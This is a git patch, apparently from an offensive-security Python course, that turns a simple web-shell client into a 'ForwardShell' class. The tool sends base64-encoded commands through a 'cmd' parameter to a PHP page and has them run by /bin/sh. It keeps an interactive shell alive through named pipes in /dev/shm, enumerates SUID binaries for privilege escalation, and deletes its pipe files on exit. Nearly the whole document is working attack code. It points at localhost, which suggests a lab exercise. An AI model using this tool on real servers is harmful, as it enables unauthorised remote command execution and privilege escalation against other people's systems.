From d7252c6782d4eab1eb48f3db0ecbd3d1d3f46a5a Mon Sep 17 00:00:00 2001
From: Manuel Vergara <manuel@vergaracarmona.es>
Date: Sat, 3 Feb 2024 12:28:27 +0100
Subject: [PATCH] Update forwardshell script

---
 .../15_hacking/12_fs/script/forwardshell.py   | 146 +++++++++++++++---
 .../15_hacking/12_fs/script/main.py           |  29 ++++
 2 files changed, 154 insertions(+), 21 deletions(-)
 create mode 100644 python-ofensivo/15_hacking/12_fs/script/main.py

diff --git a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
index 3c6725d..26ccebb 100644
--- a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
+++ b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
@@ -11,41 +11,145 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
 """
 
 import requests
-import signal
-import sys
+import time
 
 from termcolor import colored
 from base64 import b64encode
-
-def def_handler(sig, frame):
-
-    print(colored("\n[!] Exiting...", "blue"))
-    sys.exit(1)
+from random import randrange
 
 
-signal.signal(signal.SIGINT, def_handler)
+class ForwardShell:
 
-main_url = "http://localhost/index.php"
+    def __init__(self):
+
+        session = randrange(100000, 999999)
+
+        self.main_url = "http://localhost/index.php"
+
+        self.stdin = f"/dev/shm/{session}.input"
+        self.stdout = f"/dev/shm/{session}.output"
+
+        self.help_options = {
+            'enum suid': 'FileSystem SUID Privileges Enumeration',
+            'help': 'Show this help panel',
+        }
+
+        self.is_pseudo_terminal = False
+
+    def run_command(self, command):
+
+        command = b64encode(command.encode()).decode()
+
+        data = {
+            'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
+        }
+
+        try:
+            r = requests.get(self.main_url, params=data, timeout=5)
+
+            return r.text
+
+        except:
+            pass
+
+        return None
+
+    def write_stdin(self, command):
+
+        command = b64encode(command.encode()).decode()
+
+        data = {
+            'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
+        }
+
+        r = requests.get(self.main_url, params=data)
+
+    def read_stdout(self):
+
+        for _ in range(5):
+
+            read_stdout_command = f"/bin/cat {self.stdout}"
+            output_command = self.run_command(read_stdout_command)
+            time.sleep(0.2)
+
+        return output_command
+
+    def setup_shell(self):
+
+        command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
+        self.run_command(command)
+
+    def remove_data(self):
+
+        remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
+        self.run_command(remove_data_command)
+
+    def clear_stdout(self):
+
+        clear_stdout_command = f"echo '' > {self.stdout}"
+        self.run_command(clear_stdout_command)
+
+    def run(self) -> None:
+
+        self.setup_shell()
+
+        while True:
+
+            command = input(colored("> ", "yellow"))
+
+            if "script /dev/null -c bash" in command:
+
+                print(
+                    colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
+                self.is_pseudo_terminal = True
 
 
-def run_command(command):
+            if command.strip() == "enum suid":
 
-    command = b64encode(command.encode()).decode()
+                command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
 
-    data = {
-        'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
-    }
+            if command.strip() == "help":
 
-    r = requests.get(main_url, params=data)
+                print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
 
-    return r.text
+                for key, value in self.help_options.items():
+                    print(f"\t{key} - {value}")
+
+                continue
+
+            self.write_stdin(command + "\n")
+
+            output_command = self.read_stdout()
+
+            if command.strip() == "exit":
+
+                self.is_pseudo_terminal = False
+                print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
+
+                self.clear_stdout()
+                continue
 
 
-if __name__ == '__main__':
+            if self.is_pseudo_terminal:
+                lines = output_command.split("\n")
 
-    while True:
+                if len(lines) == 1:
 
-        command = input(colored("> ", "yellow"))
-        output_command = run_command(command)
+                    cleared_output = '\n'.join([lines[-1]] + lines[:1])
 
-        print(output_command)
+                elif len(lines) > 1:
+
+                    cleared_output = '\n'.join(
+                        [lines[-1]] + lines[:1] + lines[2:-1])
+
+                else:
+                    print(len(lines))
+                    print(lines)
+
+                print(cleared_output + "\n")
+
+            else:
+
+                print(output_command)
+
+            self.clear_stdout()
diff --git a/python-ofensivo/15_hacking/12_fs/script/main.py b/python-ofensivo/15_hacking/12_fs/script/main.py
new file mode 100644
index 0000000..c951144
--- /dev/null
+++ b/python-ofensivo/15_hacking/12_fs/script/main.py
@@ -0,0 +1,29 @@
+
+#!/usr/bin/env python3
+"""
+Fichero principal de la aplicación.
+"""
+
+import signal
+import sys
+
+from forwardshell import ForwardShell
+from termcolor import colored
+
+
+def def_handler(sig, frame) -> None:
+
+    print(colored("\n[!] Exiting...", "blue"))
+
+    my_forward_shell.remove_data()
+
+    sys.exit(1)
+
+
+signal.signal(signal.SIGINT, def_handler)
+
+
+if __name__ == '__main__':
+
+    my_forward_shell = ForwardShell()
+    my_forward_shell.run()